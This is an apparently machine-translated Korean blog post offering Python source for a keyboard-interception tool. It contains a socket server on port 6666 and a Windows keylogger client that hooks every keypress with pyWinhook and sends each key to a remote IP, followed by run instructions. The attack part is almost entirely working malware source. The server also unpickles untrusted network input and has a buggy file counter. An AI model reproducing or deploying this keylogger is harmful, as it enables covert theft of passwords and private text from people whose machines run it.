python 감청 키보드 구현
import pickle
from io import BytesIO
import socket
#
def Server_Recive(ip,port):
socket_obj = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket_obj.bind((ip,port))
socket_obj.listen(5)
file = 1
while True:
connection,address = socket_obj.accept()
#
recieved_message = b''
recieved_message_fragment = connection.recv(1024)
while recieved_message_fragment:
recieved_message += recieved_message_fragment
recieved_message_fragment = connection.recv(1024)
try:
obj = pickle.loads(recieved_message)
print(obj['Key'],end=' ')
except EOFError:
file_name = 'recv_image_' + str(file_on) + '.bmp'
recv_image = open(file_name,'wb')
recv_image.write(recieved_message)
file_on += 1
connection.close()
if __name__ == '__main__':
Server_IP = '0.0.0.0'
Server_Port = 6666
Server_Recive(Server_IP,Server_Port)
키보드 감청 프로그램
#
import pythoncom,pyWinhook,pickle,socket
from io import BytesIO
def Client_PIC(ip,port,obj):
try:
msg = pickle.dumps(obj)
send_message = BytesIO(msg)
send_message_fragment = send_message.read(1024)
except:
send_message = obj
send_message_fragment = send_message.read(1024)
socket_obj = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket_obj.connect((ip,port))
while send_message_fragment:
socket_obj.send(send_message_fragment)
send_message_fragment = send_message.read(1024)
socket_obj.close()
def OnkeyBoardEvent(event):
dict_key = {}
dict_key['MessageName'] = event.MessageName
dict_key['Key'] = event.Key
Client_PIC(' ip ',6666,dict_key)
return True
def Keylogger():
hm = pyWinhook.HookManager()
hm.KeyDown = OnkeyBoardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
if __name__ == '__main__':
Keylogger()
그 중의 pythoncom,pyWinhook 바 이 두 는 설치 방법 을 찾 습 니 다.실행(서버 를 먼저 실행 하고 감청 프로그램 을 실행)
이상 이 바로 본 고의 모든 내용 입 니 다.여러분 의 학습 에 도움 이 되 고 저 희 를 많이 응원 해 주 셨 으 면 좋 겠 습 니 다.
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
로마 숫자를 정수로 또는 그 반대로 변환그 중 하나는 로마 숫자를 정수로 변환하는 함수를 만드는 것이었고 두 번째는 그 반대를 수행하는 함수를 만드는 것이었습니다. 문자만 포함합니다'I', 'V', 'X', 'L', 'C', 'D', 'M' ; 문자열이 ...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.